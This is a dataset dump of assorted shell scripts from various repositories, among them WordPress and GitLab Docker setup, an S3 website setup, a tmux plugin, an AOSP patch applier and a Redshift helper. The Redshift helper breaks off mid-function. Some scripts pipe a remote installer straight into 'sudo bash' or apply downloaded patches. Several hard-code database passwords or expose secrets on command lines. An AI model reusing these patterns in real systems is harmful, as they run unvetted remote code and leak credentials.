blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
f12e1350369e2c04a28a4f0a2f0135814f139004
|
Shell
|
josh-martin989/BioperlClass
|
/week07/q1.sh
|
UTF-8
| 134
| 2.90625
| 3
|
[] |
no_license
|
#!/bin/sh
# Create four empty files (q1_file1..q1_file4), then move them into ./q1_test.
for n in 1 2 3 4; do
  touch "q1_file$n"
done
mkdir -p q1_test
for n in 1 2 3 4; do
  mv "./q1_file$n" ./q1_test/
done
| true
|
fb9539ddafe31ada17870f774f0a1a76aa63d8f4
|
Shell
|
bernEsp/algorithms
|
/zshrc
|
UTF-8
| 1,553
| 2.609375
| 3
|
[] |
no_license
|
# NOTE(review): this zshrc is almost entirely commented out; the only line
# that actually executes is the final 'source' of the powerline bindings.
# @author Sebastian Tramp <mail@sebastian.tramp.name>
# # @license http://opensource.org/licenses/gpl-license.php
# #
# # the main RC file (will be linked to ~/.zshrc)
# #
#
# # first include of the environment
# source $HOME/.config/zsh/environment.zsh
#
# typeset -ga sources
# sources+="$ZSH_CONFIG/environment.zsh"
# sources+="$ZSH_CONFIG/options.zsh"
# sources+="$ZSH_CONFIG/prompt.zsh"
# sources+="$ZSH_CONFIG/functions.zsh"
# sources+="$ZSH_CONFIG/aliases.zsh"
#
# # highlights the live command line
# # Cloned From: git://github.com/nicoulaj/zsh-syntax-highlighting.git
# sources+="$ZSH_CONFIG/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh"
#
# # provides the package name of a non existing executable
# # (sudo apt-get install command-not-found)
# sources+="/etc/zsh_command_not_found"
#
# # Check for a system specific file
# systemFile=`uname -s | tr "[:upper:]" "[:lower:]"`
# sources+="$ZSH_CONFIG/$systemFile.zsh"
#
# # Private aliases and adoptions
# sources+="$ZSH_CONFIG/private.zsh"
#
# # completion config needs to be after system and private config
# sources+="$ZSH_CONFIG/completion.zsh"
#
# # fasd integration and config
# sources+="$ZSH_CONFIG/fasd.zsh"
#
# # Private aliases and adoptions added at the very end (e.g. to start byuobu)
# sources+="$ZSH_CONFIG/private.final.zsh"
#
#
#
# # try to include all sources
# foreach file (`echo $sources`)
# if [[ -a $file ]]; then
# source $file
# fi
# end
#
#powerline
# NOTE(review): hard-coded Python 2.7 site-packages path — this breaks if
# powerline is installed elsewhere; confirm the install location.
source /usr/local/lib/python2.7/site-packages/powerline/bindings/zsh/powerline.zsh
| true
|
1ba2f40f88fbba63c4646aa33260ddf8be2c181e
|
Shell
|
HayrapetyanSV/lab_OSS
|
/lab3/2.5.sh
|
UTF-8
| 211
| 2.8125
| 3
|
[] |
no_license
|
#!/bin/bash
# List every *.txt file under $HOME, concatenate them into /tmp/file2.5.txt,
# then report the total line count and the file's size on disk.
find ~ -type f -name "*.txt"
# NOTE(review): '>>' appends, so repeated runs keep growing /tmp/file2.5.txt —
# confirm whether a fresh file ('>') is intended.
find ~ -type f -name "*.txt" -exec cat {} >> /tmp/file2.5.txt \;
echo "Всего строк:"
# fixed: useless use of cat; 'wc -l < file' prints the same bare count
wc -l < /tmp/file2.5.txt
echo "Размер:"
du -b /tmp/file2.5.txt
| true
|
4f657c2c4033923484853dc57c9abf468dd746fb
|
Shell
|
domitry/exp_c
|
/build.sh
|
UTF-8
| 145
| 2.546875
| 3
|
[
"MIT",
"CC-BY-2.0"
] |
permissive
|
#!/bin/sh
# Compile ../ex<N>.c into ./compiled/ex<N>.out (linking math + OpenGL/GLUT)
# and run the result.
# Usage: build.sh <N>
src="../ex${1}.c"
dst="./ex${1}.out"
# fixed: abort if the build directory is missing instead of compiling/running
# in the wrong place
cd compiled || exit 1
# fixed: quote expansions so an unusual $1 cannot word-split the paths
gcc "$src" -o "$dst" -lm -lGL -lglut -Wall
echo "builded :)"
"$dst"
echo "done :-)"
cd ..
| true
|
6c3c7ee6d55351007be7a83da1d8f772cf4a201a
|
Shell
|
viniciusesteter/WordPress_Zabbix
|
/iniciar_wordpress.sh
|
UTF-8
| 2,514
| 3.1875
| 3
|
[] |
no_license
|
#!/bin/bash
# Bootstrap an Amazon Linux host: install the SSM agent, Docker and
# docker-compose, then bring up a WordPress + MySQL + phpMyAdmin stack
# defined inline below.
cd /tmp # work from /tmp
sudo yum install -y https://s3.amazonaws.com/ec2-downloads-windows/SSMAgent/latest/linux_amd64/amazon-ssm-agent.rpm # download and install the SSM Agent
sudo systemctl enable amazon-ssm-agent # start the SSM Agent on boot
sudo systemctl start amazon-ssm-agent # start the SSM Agent now
sudo yum update -y # update the instance/OS
sudo amazon-linux-extras install -y docker # install Amazon's docker extras
sudo yum install -y docker # install docker
sudo service docker start # start the Docker service
sudo curl -L "https://github.com/docker/compose/releases/download/1.29.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose # download docker-compose as documented on its Docker Hub page
sudo chmod +x /usr/local/bin/docker-compose # make docker-compose executable
sudo ln -s /usr/local/bin/docker-compose /usr/bin/docker-compose # symlink in case /usr/local/bin is not on PATH
sudo mkdir /wordpress # create the wordpress directory
# fixed: 'sudo cd /wordpress/' was a no-op ('cd' ran in a child process), so
# docker-compose.yml used to be written to /tmp instead of /wordpress.
cd /wordpress/
sudo touch docker-compose.yml # create docker-compose.yml
sudo tee -a docker-compose.yml > /dev/null <<EOT
version: '3'
services:
# Base de dados
db:
image: mysql:5.7
volumes:
- ./volumes/mysql:/var/lib/mysql
restart: always
environment:
MYSQL_ROOT_PASSWORD: password
MYSQL_DATABASE: wordpress
MYSQL_USER: wordpress
MYSQL_PASSWORD: wordpress
networks:
- wpsite
# phpmyadmin
phpmyadmin:
depends_on:
- db
image: phpmyadmin/phpmyadmin
restart: always
ports:
- '8080:80'
environment:
PMA_HOST: db
MYSQL_ROOT_PASSWORD: password
networks:
- wpsite
# Wordpress
wordpress:
depends_on:
- db
image: wordpress:latest
ports:
- '8000:80'
volumes:
- ./volumes/wordpress/:/var/www/html
restart: always
environment:
WORDPRESS_DB_HOST: db:3306
WORDPRESS_DB_USER: wordpress
WORDPRESS_DB_PASSWORD: wordpress
networks:
- wpsite
networks:
wpsite:
volumes:
db_data:
EOT
sudo docker-compose up -d # start the stack; docker pulls the latest wordpress image
sudo systemctl start docker.service # start Docker now
sudo systemctl enable docker.service # start Docker on every boot
| true
|
76ffeebc122ce1d75ae39ff65f24ec348c860e39
|
Shell
|
ybz216/exonum-java-binding
|
/.travis/run_python_tests.sh
|
UTF-8
| 946
| 3.03125
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/usr/bin/env bash
# Runs unit tests of exonum_launcher_java_plugins.
# Requires: TRAVIS_BUILD_DIR (set by Travis CI), python3.7, maven, curl,
# wget and unzip on PATH.
# Fail immediately in case of errors and/or unset variables
set -eu -o pipefail
# Echo commands so that the progress can be seen in CI server logs.
set -x
cd "${TRAVIS_BUILD_DIR}/exonum-java-binding"
# Generate protobuf files needed for plugins
source ./tests_profile
mvn install -DskipTests -DskipRustLibBuild -pl common -am
cd "exonum_launcher_java_plugins"
# Install pip
curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py
python3.7 get-pip.py --user
# Install dependencies
# NOTE(review): 'pip3' may not be the pip just installed for python3.7 —
# confirm both resolve to the same interpreter on the CI image.
pip3 install --user -r requirements.txt --no-binary=protobuf
# Install exonum_launcher_java_plugins
pip3 install --user -e .
# Download the protobuf compiler (pinned to v3.11.3)
wget https://github.com/protocolbuffers/protobuf/releases/download/v3.11.3/protoc-3.11.3-linux-x86_64.zip
unzip protoc-3.11.3-linux-x86_64.zip
# PROTOC tells the protobuf tooling where the compiler binary lives.
export PROTOC="$(pwd)/bin/protoc"
# Run tests
cd tests
python3.7 -m unittest -v
| true
|
0119908bcded7a64673cb376b6202af8166aaf13
|
Shell
|
ddkits/cli
|
/ddkits-files/ddkits/ddk-git.sh
|
UTF-8
| 6,455
| 3.234375
| 3
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
#!/bin/bash
# fixed: was '#!/bin/sh' — the script uses [[ ]] tests and <(...) process
# substitution, which are bash-only features.
# Script.sh
#
# PHP7
#
# This system built by Mutasem Elayyoub DDKits.com
# Remove stale generated files from a previous run.
if [[ -f "${DDKITSFL}/ddkits.env.yml" ]]; then
rm $DDKITSFL/ddkits.env.yml
fi
# old generated compose file
if [[ -f "${DDKITSFL}/ddkitsnew.yml" ]]; then
rm $DDKITSFL/ddkitsnew.yml
fi
# old generated Dockerfile
if [[ -f "${DDKITSFL}/ddkits-files/git/Dockerfile" ]]; then
rm $DDKITSFL/ddkits-files/git/Dockerfile
fi
# NOTE(review): this removes ddkits-files/ddkits.fix.sh, but the file is
# regenerated below under git-deploy/ddkits.fix.sh — confirm the paths.
if [[ -f "${DDKITSFL}/ddkits-files/ddkits.fix.sh" ]]; then
rm $DDKITSFL/ddkits-files/ddkits.fix.sh
fi
if [[ -f "${DDKITSFL}/ddkits-files/git/sites/$DDKITSHOSTNAME.conf" ]]; then
rm $DDKITSFL/ddkits-files/git/sites/$DDKITSHOSTNAME.conf
fi
if [[ -f "${DDKITSFL}/ddkits-files/git/sites/gitlab.rb" ]]; then
rm $DDKITSFL/ddkits-files/git/sites/gitlab.rb
fi
# Ensure the generated-sites and ssl directories exist and are writable.
if [[ ! -d "${DDKITSFL}/ddkits-files/git/sites" ]]; then
mkdir $DDKITSFL/ddkits-files/git/sites
chmod -R 777 $DDKITSFL/ddkits-files/git/sites
fi
# LAMP PHP 7
if [[ ! -d "${DDKITSFL}/ddkits-files/ddkits/ssl" ]]; then
mkdir $DDKITSFL/ddkits-files/ddkits/ssl
chmod -R 777 $DDKITSFL/ddkits-files/ddkits/ssl
fi
cat "./ddkits-files/ddkits/logo.txt"
# Create a self-signed certificate (10 years) with a SAN for $DDKITSSITES.
# NOTE(review): the openssl.cnf path under /System/Library is macOS-specific —
# confirm this script only targets macOS hosts.
openssl req \
-newkey rsa:2048 \
-x509 \
-nodes \
-keyout $DDKITSSITES.key \
-new \
-out $DDKITSSITES.crt \
-subj /CN=$DDKITSSITES \
-reqexts SAN \
-extensions SAN \
-config <(cat /System/Library/OpenSSL/openssl.cnf \
<(printf '[SAN]\nsubjectAltName=DNS:'$DDKITSSITES'')) \
-sha256 \
-days 3650
mv $DDKITSSITES.key $DDKITSFL/ddkits-files/ddkits/ssl/
mv $DDKITSSITES.crt $DDKITSFL/ddkits-files/ddkits/ssl/
echo "ssl crt and .key files moved correctly"
# Generate the Apache vhost (HTTP + HTTPS) for the GitLab site.
echo -e '
<VirtualHost *:80>
ServerAdmin melayyoub@outlook.com
ServerName '$DDKITSSITES'
'$DDKITSSERVERS'
DocumentRoot /opt/gitlab/embedded/service/gitlab-rails/'$WEBROOT'
ErrorLog /opt/gitlab/embedded/service/gitlab-rails/'$WEBROOT'/error.log
CustomLog /opt/gitlab/embedded/service/gitlab-rails/'$WEBROOT'/access.log combined
<Location "/">
Require all granted
AllowOverride All
Order allow,deny
allow from all
</Location>
<Directory "/opt/gitlab">
Require all granted
AllowOverride All
Order allow,deny
allow from all
</Directory>
</VirtualHost> <VirtualHost *:443>
ServerAdmin melayyoub@outlook.com
ServerName '$DDKITSSITES'
'$DDKITSSERVERS'
DocumentRoot /opt/gitlab/embedded/service/gitlab-rails/'$WEBROOT'
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
<Location "/">
Require all granted
AllowOverride All
Order allow,deny
allow from all
</Location>
<Directory "/var/www/html">
Require all granted
AllowOverride All
Order allow,deny
allow from all
</Directory>
</VirtualHost>
' > $DDKITSFL/ddkits-files/git/sites/$DDKITSHOSTNAME.conf
# Start gitlab.rb from the example template, then append env-specific config.
cat $DDKITSFL/ddkits-files/git/sites/gitlab-example.rb > $DDKITSFL/ddkits-files/git/sites/gitlab.rb
echo -e "## GitLab URL
##! URL on which GitLab will be reachable.
##! For more details on configuring external_url see:
##! https://docs.gitlab.com/omnibus/settings/configuration.html#configuring-the-external-url-for-gitlab
external_url 'http://"$DDKITSSITES"'
# Give apache user privileges to listen to GitLab
web_server['external_users'] = ['www-data']
### GitLab database settings
###! Docs: https://docs.gitlab.com/omnibus/settings/database.html
###! **Only needed if you use an external database.**
gitlab_rails['db_adapter'] = 'mysql'
gitlab_rails['db_encoding'] = 'unicode'
# gitlab_rails['db_collation'] = nil
gitlab_rails['db_database'] = '"$MYSQL_DATABASE"'
gitlab_rails['db_pool'] = 10
gitlab_rails['db_username'] = '"${MYSQL_USER}"'
gitlab_rails['db_password'] = '"$MYSQL_ROOT_PASSWORD"'
gitlab_rails['db_host'] = '"${DDKITSIP}"'
gitlab_rails['db_port'] = "${DDKITSDBPORT}"
# gitlab_rails['db_socket'] = nil
# gitlab_rails['db_sslmode'] = nil
# gitlab_rails['db_sslrootcert'] = nil
# gitlab_rails['db_prepared_statements'] = false
# gitlab_rails['db_statements_limit'] = 1000
#### Redis TCP connection
gitlab_rails['redis_host'] = '"${DDKITSIP}"'
gitlab_rails['redis_port'] = "${DDKITSREDISPORT}"
# gitlab_rails['redis_password'] = nil
# gitlab_rails['redis_database'] = 0
" >> $DDKITSFL/ddkits-files/git/sites/gitlab.rb
# Generate the Dockerfile for the GitLab web container.
echo -e '
FROM ddkits/lamp:'$DDKITSPHPVERSION'
MAINTAINER Mutasem Elayyoub "melayyoub@outlook.com"
RUN ln -sf $DDKITSFL/logs /var/log/nginx/access.log \
&& ln -sf $DDKITSFL/logs /var/log/nginx/error.log \
&& chmod 600 /etc/mysql/my.cnf \
&& a2enmod rewrite \
&& rm /etc/apache2/sites-enabled/*
COPY ./sites/gitlab.rb /var/www/html/gitlab.rb
RUN chmod -R 777 /var/www/html
COPY php.ini /etc/php/7.0/fpm/php.ini
COPY ./sites/'$DDKITSHOSTNAME'.conf /etc/apache2/sites-enabled/'$DDKITSHOSTNAME'.conf
# Fixing permissions
RUN chown -R www-data:www-data /var/www/html
RUN usermod -u 1000 www-data
' > $DDKITSFL/ddkits-files/git/Dockerfile
# Generate the in-container fix-up script that installs and configures GitLab.
echo -e '
apt-get install -y curl openssh-server ca-certificates --force-yes -y
curl https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.deb.sh | sudo bash
apt-get install gitlab-ce -y
cp /var/www/html/gitlab.rb /etc/gitlab/gitlab.rb
chown -R www-data:www-data /opt/gitlab
chown -R www-data:www-data /etc/gitlab
usermod -u 1000 www-data
apt-get install -y postfix
systemctl restart gitlab-runsvdir \
&& systemctl start sshd postfix \
&& systemctl enable sshd postfix \
&& iptables -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT \
&& /etc/init.d/iptables save \
&& gitlab-ctl reconfigure ' > $DDKITSFL/git-deploy/ddkits.fix.sh
# Append the web service definition to the environment compose file.
echo -e 'version: "3.1"
services:
web:
build: '${DDKITSFL}'/ddkits-files/git
image: ddkits/git:latest
volumes:
- '${DDKITSFL}'/git-deploy:/opt/gitlab
stdin_open: true
tty: true
container_name: '${DDKITSHOSTNAME}'_ddkits_web
networks:
- ddkits
ports:
- "'$DDKITSWEBPORT':80"
- "'$DDKITSWEBPORTSSL':443"
' >> $DDKITSFL/ddkits.env.yml
# Prime sudo's credential cache; the alias file contents are discarded.
echo $SUDOPASS | sudo -S cat ~/.ddkits_alias > /dev/null
# NOTE(review): an alias defined in a non-interactive script does not persist
# after the script exits — the durable alias is the one appended to the file below.
alias ddkc-$DDKITSSITES='docker exec -it ${DDKITSHOSTNAME}_ddkits_web /bin/bash'
# fixed the alias for machine
echo "alias ddkc-"$DDKITSSITES"='ddk go && docker exec -it "$DDKITSHOSTNAME"_ddkits_web /bin/bash'" >> ~/.ddkits_alias_web
echo $SUDOPASS | sudo -S chmod -R 777 $DDKITSFL/git-deploy
cd $DDKITSFL
| true
|
16ecab0e7f132654cbb1935ebf936d36e7f95710
|
Shell
|
rjmeats/AWS-Trials
|
/AWSTrials/CLI/websites/setupSimpleS3Bucket.sh
|
UTF-8
| 1,405
| 3.421875
| 3
|
[] |
no_license
|
# Configure an existing S3 bucket as a public static website:
# 1) set a website configuration (index.html), 2) attach a public-read policy.
# Expects SIMPLE_S3_BUCKET_NAME (plus BUCKET_REGION / SIMPLE_SITE_FILES for
# the informational echoes) to be defined by the sourced env scripts.
. ../aws_env_setup.sh
. ./env.sh
echo
echo "$SHELL at $(date)"
MY_BUCKET="${SIMPLE_S3_BUCKET_NAME}"
echo
echo "S3 bucket is ${MY_BUCKET}"
echo "Bucket region is ${BUCKET_REGION}"
echo "Source files are under ${SIMPLE_SITE_FILES}"
if [[ -z "${MY_BUCKET}" ]]
then
echo "Bucket name not defined"
exit 1
fi
# Tell S3 to treat this bucket as a website
# NOTE(review): $$-suffixed temp names are predictable; mktemp would be safer.
TMP_CFG_FILE=site.cfg.$$
# Here document to specify website config info
cat > "${TMP_CFG_FILE}" << EOF
{
"IndexDocument": {
"Suffix": "index.html"
}
}
EOF
echo
echo "Tell S3 that this bucket is a website"
echo
aws s3api put-bucket-website --bucket "${MY_BUCKET}" --website-configuration "file://${TMP_CFG_FILE}"
rm "${TMP_CFG_FILE}"
echo
echo "Show bucket website info"
echo
aws s3api get-bucket-website --bucket "${MY_BUCKET}"
# Tell S3 to make this public publically readable
TMP_CFG_FILE=policy.cfg.$$
# Here document to specify the public-read bucket policy
cat > "${TMP_CFG_FILE}" << EOF
{
"Version":"2012-10-17",
"Statement":[{
"Sid":"PublicReadGetObject",
"Effect":"Allow",
"Principal": "*",
"Action":["s3:GetObject"],
"Resource":["arn:aws:s3:::${MY_BUCKET}/*"
]
}
]
}
EOF
echo
echo "Tell S3 to use a public access policy for the bucket"
echo
aws s3api put-bucket-policy --bucket "${MY_BUCKET}" --policy "file://${TMP_CFG_FILE}"
rm "${TMP_CFG_FILE}"
echo
echo "Show bucket policy"
echo
aws s3api get-bucket-policy --bucket "${MY_BUCKET}"
| true
|
226f70a4a29cf20f75572bbbcdf7b0e21f4e2a9d
|
Shell
|
eemed/tmux-picker
|
/tmux-picker.sh
|
UTF-8
| 3,038
| 3.671875
| 4
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# tmux-picker: open a temporary "[picker]" window that runs hint mode against
# a captured copy of the currently active pane.
# Directory this script lives in; used to locate the hint_mode.sh helper.
CURRENT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Create a detached "[picker]" window running /bin/sh and print
# "<pane_id>:<window_id>" on stdout.
# When the global $last_pane_id is non-empty, add two dummy splits sized from
# the difference between the window and the active pane, so the picker pane
# matches the current pane's geometry (handles wrapped lines in splits).
function init_picker_pane() {
local picker_ids=$(tmux new-window -F "#{pane_id}:#{window_id}" -P -d -n "[picker]" "/bin/sh")
local picker_pane_id=$(echo "$picker_ids" | cut -f1 -d:)
local picker_window_id=$(echo "$picker_ids" | cut -f2 -d:)
if [[ ! -z "$last_pane_id" ]]; then # to save precious milliseconds;)
# Geometry of the active pane and of the whole active window.
local current_size=$(tmux list-panes -F "#{pane_width}:#{pane_height}:#{?pane_active,active,nope}" | grep active)
local current_width=$(echo "$current_size" | cut -f1 -d:)
local current_height=$(echo "$current_size" | cut -f2 -d:)
local current_window_size=$(tmux list-windows -F "#{window_width}:#{window_height}:#{?window_active,active,nope}" | grep active)
local current_window_width=$(echo "$current_window_size" | cut -f1 -d:)
local current_window_height=$(echo "$current_window_size" | cut -f2 -d:)
# this is needed to handle wrapped lines inside split windows:
tmux split-window -d -t "$picker_pane_id" -h -l "$((current_window_width - current_width - 1))" '/bin/sh'
tmux split-window -d -t "$picker_pane_id" -l "$((current_window_height - current_height - 1))" '/bin/sh'
fi
echo "$picker_pane_id:$picker_window_id"
}
# Capture the contents of pane $1 into file $2, keeping escape sequences (-e)
# and joining wrapped lines (-J). If the pane is in copy mode, capture the
# scrolled-back region currently on screen instead of the live view.
function capture_pane() {
local pane_id=$1
local out_path=$2
# pane height, scroll offset, and whether the pane is in copy mode
local pane_info=$(tmux list-panes -s -F "#{pane_id}:#{pane_height}:#{scroll_position}:#{?pane_in_mode,1,0}" | grep "^$pane_id")
local pane_height=$(echo $pane_info | cut -d: -f2)
local pane_scroll_position=$(echo $pane_info | cut -d: -f3)
local pane_in_copy_mode=$(echo $pane_info | cut -d: -f4)
local start_capture=""
if [[ "$pane_in_copy_mode" == "1" ]]; then
# Window on the scrollback: lines above the visible top are negative.
start_capture=$((-pane_scroll_position))
end_capture=$((pane_height - pane_scroll_position - 1))
else
# Visible screen only ('-' means the last visible line).
start_capture=0
end_capture="-"
fi
tmux capture-pane -e -J -p -t $pane_id -E $end_capture -S $start_capture > $out_path
}
# Type a command into the given tmux pane and submit it with Enter.
# The leading space presumably keeps the command out of shell history
# (HISTCONTROL=ignorespace) — confirm.
pane_exec() {
  local target_pane="$1"
  local command_line="$2"
  tmux send-keys -t "$target_pane" " $command_line"
  tmux send-keys -t "$target_pane" Enter
}
# Orchestrate one picker run for pane $1 (with $2 as the previous pane):
# build the picker pane, capture the target pane to a temp file, and launch
# hint_mode.sh inside the picker. Prints the picker pane id on stdout.
function prompt_picker_for_pane() {
local current_pane_id=$1
local last_pane_id=$2
local picker_init_data=$(init_picker_pane "$last_pane_id")
local picker_pane_id=$(echo "$picker_init_data" | cut -f1 -d':')
local picker_window_id=$(echo "$picker_init_data" | cut -f2 -d':')
# Snapshot of the target pane that hint_mode.sh will annotate.
local tmp_path=$(mktemp)
capture_pane "$current_pane_id" "$tmp_path"
pane_exec "$picker_pane_id" "$CURRENT_DIR/hint_mode.sh \"$current_pane_id\" \"$picker_pane_id\" \"$last_pane_id\" \"$picker_window_id\" $tmp_path"
echo $picker_pane_id
}
# Pane the user was previously in (empty if none); used to size the picker splits.
last_pane_id=$(tmux display -pt':.{last}' '#{pane_id}' 2>/dev/null)
# The currently focused pane — its contents are what gets captured.
current_pane_id=$(tmux list-panes -F "#{pane_id}:#{?pane_active,active,nope}" | grep active | cut -d: -f1)
picker_pane_id=$(prompt_picker_for_pane "$current_pane_id" "$last_pane_id")
| true
|
98a1dc8c291531241786ab85476286d3c4e23d95
|
Shell
|
aosp-tissot/local_manifest
|
/patch.sh
|
UTF-8
| 1,206
| 3.296875
| 3
|
[] |
no_license
|
#!/bin/bash
# Apply two patch series ('patches/' and 'sooti-patches/') to projects in a
# repo(1) checkout. Usage: patch.sh <dir containing patches/>
set -e
# Resolve the patches dir to an absolute path (we pushd into projects below).
patches="$(readlink -f -- $1)"
wget https://github.com/aosp-tissot/local_manifest/raw/aosp-11.0/sooti-patches.zip
unzip sooti-patches.zip
# One subdirectory per project in either patch set; names encode '/' as '_'.
for project in $(cd $patches/patches; echo *) $(cd $patches/sooti-patches; echo *) ;do
# Map the directory name back to a repo project path; strip 'platform/'.
p="$(tr _ / <<<$project |sed -e 's;platform/;;g')"
[ "$p" == build ] && p=build/make
repo sync -l --force-sync $p
pushd $p
# Start from a pristine tree so patch application is deterministic.
git clean -fdx; git reset --hard
for patch in $patches/patches/$project/*.patch $patches/sooti-patches/$project/*.patch;do
#Check if patch is already applied (reverse dry-run succeeds => applied)
if patch -f -p1 --dry-run -R < $patch > /dev/null;then
continue
fi
if git apply --check $patch;then
git am $patch
elif patch -f -p1 --dry-run < $patch > /dev/null;then
#This will fail
# 'git am' fails but leaves the am session open; apply with patch(1),
# stage the result, then continue the session to keep author metadata.
git am $patch || true
patch -f -p1 < $patch
git add -u
git am --continue
else
echo "Failed applying $patch"
fi
done
popd
done
| true
|
2b283f2fcf0a8f4b4014a8b89281bfcf47ea1815
|
Shell
|
OragamiSwami/Piss_Scraper
|
/pull_piss_links.sh
|
UTF-8
| 1,726
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/bash
# fixed: added the missing shebang — the script uses bash-only features
# ('function' keyword, '&>>' redirection).
#author :OragamiSwami
#date :20210605
#version :0.1
#notes :Install curl and unrealircd (https://www.unrealircd.org/download)
#usage :pull_piss_links.sh
cd "$(dirname "$0")"
log="pull.log"
hubfile="hubs.conf"
linkfile="links.conf"
unreal_dir="/home/ircd/unrealircd/"
echo "Start @ `date`" &>> $log
# pull <name> <url> <outfile> <mincount>
# Fetch a link-block list, sanitize it, sanity-check the entry count against
# the raw download, and keep a last-known-good (.lng) copy that is restored
# when the count check or configtest fails.
function pull {
name=$1
link=$2
file=$3
mincount=$4
echo "Pulling $name" &>> $log
curl -sk "$link" -o .$file.orig
c=`grep -c host .$file.orig`
# Strip unexpected characters and drop any autoconnect directives.
cat .$file.orig | tr -cd '[:alnum:]._\-;#":,\{\}\(\)\/\!\?\*+=@ \n\t'"'" | sed 's/^ [^ ]//;s/\t/ /g;s/autoconnect\s*;//' > .$file.tmp
awk '/^(link|ban) /,/^}/' .$file.tmp > $file
d=`grep -c hostname $file`
echo "Got $d links for $name" &>> $log
if [ $d -ne $c ] && [ $d -ne `expr $c - 1` ] && [ $d -le $mincount ] ; then
echo "$name count check failed.. Restoring LNG" &>> $log
cp $file .$file.bad
# fixed: was '( ...; return -1 )' — 'return' inside a subshell only exits
# the subshell (the function kept running), and -1 is not a valid status.
cp .$file.lng $file || { echo "Failed to restore LNG" &>> $log; return 1; }
fi
# Keep the new file as last-known-good only if configtest passes.
$unreal_dir/unrealircd configtest &>> $log && cp $file .$file.lng || ( cp $file .$file.bad; cp .$file.lng $file )
echo "End $name" &>> $log
}
pull "Hubs" "https://api.shitposting.space/link/hubs" $hubfile 10
pull "Americas" "https://api.shitposting.space/link/leaves/America" $linkfile 20
#pull "Europe" "https://api.shitposting.space/link/leaves/Europe" $linkfile 20
#pull "APAC" "https://api.shitposting.space/link/leaves/APAC" $linkfile 11
#pull "Africa" "https://api.shitposting.space/link/leaves/Africa" $linkfile 1
sed -i 's/class servers;/class hubs;/' $hubfile
$unreal_dir/unrealircd configtest &>>$log && $unreal_dir/unrealircd rehash &>>$log
echo -e "End @ `date`\n\n" &>> $log
| true
|
0ddbf549b2f5189e0d489640fcb0491ce463dadc
|
Shell
|
ravitomar2010/hello-world
|
/a2i-devops/tools/manage_redshift/modifyBatchAccess.sh
|
UTF-8
| 12,758
| 3.46875
| 3
|
[] |
no_license
|
#!/bin/bash
#######################################################################
########################### Global Variables ##########################
#######################################################################
# Scratch copy of the access list pulled from S3 (referenced by name below).
filename=tmpAccessList.txt
##################### Test Parameters ##############
# NOTE(review): these look like hard-coded test values that are meant to be
# overridden/edited per run — confirm before using against a real environment.
dbClient='hyke'
env='stage'
batchUser='batch_pricing'
schemaNames='audit_sysmgmt, delivery_dbo'
accessLevel='READ'
#######################################################################
############################# Generic Code ############################
#######################################################################
getProfile(){
# Derive the AWS CLI profile from $env and pick a Redshift cluster id.
# curr_dir=`pwd`
# profile=`echo "$curr_dir" | rev | cut -d '/' -f1 | rev`
echo "dbClient is $dbClient"
profile="${env}"
echo "profile is $profile"
# NOTE(review): the mapping looks inverted — 'stage' selects 'axiom-rnd' and
# everything else selects 'axiom-stage'; confirm this is intentional.
# (Also: 'redshfitClusterID' is misspelled and appears unused in this file.)
if [[ $profile == 'stage' ]]; then
redshfitClusterID='axiom-rnd'
else
redshfitClusterID='axiom-stage'
fi
}
getConnectionDetails(){
# Read Redshift connection settings and account id from SSM Parameter Store
# into globals: hostName, portNo, dbName, redshiftPassword, accountID,
# redshiftUserName.
echo 'Fetching required parameters from SSM'
hostName=`aws ssm get-parameter --name "/a2i/$profile/redshift/host" --with-decryption --profile $profile --output text --query Parameter.Value`
portNo=`aws ssm get-parameter --name "/a2i/$profile/redshift/port" --with-decryption --profile $profile --output text --query Parameter.Value`
dbName=`aws ssm get-parameter --name "/a2i/$profile/redshift/db/$dbClient" --with-decryption --profile $profile --output text --query Parameter.Value`
redshiftPassword=`aws ssm get-parameter --name "/a2i/infra/redshift_$profile/rootpassword" --with-decryption --profile $profile --output text --query Parameter.Value`
accountID=`aws ssm get-parameter --name "/a2i/$profile/accountid" --with-decryption --profile $profile --output text --query Parameter.Value`
# NOTE(review): mirrors getProfile's stage->rnd mapping — confirm the user
# matches the cluster that is actually selected.
if [[ $profile == "stage" ]]; then
redshiftUserName="axiom_rnd"
else
redshiftUserName="axiom_stage"
fi
# echo "$hostName,$portNo,$dbName,$redshiftPassword,$redshiftUserName,$accountID"
}
executeQueryAndGetResults(){
# Run one SQL statement ($1) against Redshift and capture its output in the
# global 'results' (tuples only, unaligned, -X skips psqlrc).
sqlQuery=$1
echo "Query is $sqlQuery"
# NOTE(review): '-F' takes an argument, so it consumes the literal string
# '--no-align' as the field separator here; '-A' (in -tAX) already disables
# alignment — confirm the intended flags.
# fixed: backticks replaced with $( ) command substitution.
results=$(psql -tAX "host=$hostName port=$portNo dbname=$dbName user=$redshiftUserName password=$redshiftPassword" -F --no-align -c "$sqlQuery")
}
executeQueryAndWriteResultsToFile(){
# Run one SQL statement ($1) and write its output to file $2.
# Note: 'results' ends up empty because all output is redirected to the file.
sqlQuery=$1
outputFile=$2
echo "Query is $sqlQuery"
# fixed: backticks replaced with $( ); output file quoted.
results=$(psql -tAX "host=$hostName port=$portNo dbname=$dbName user=$redshiftUserName password=$redshiftPassword" -F --no-align -c "$sqlQuery" > "$outputFile")
}
executeQueryFile(){
# Execute every statement in SQL file $1 against Redshift, echoing each
# statement (-a/-e) and never prompting for a password (-w).
sqlQueryFile=$1
echo "Executing queries from file $sqlQueryFile"
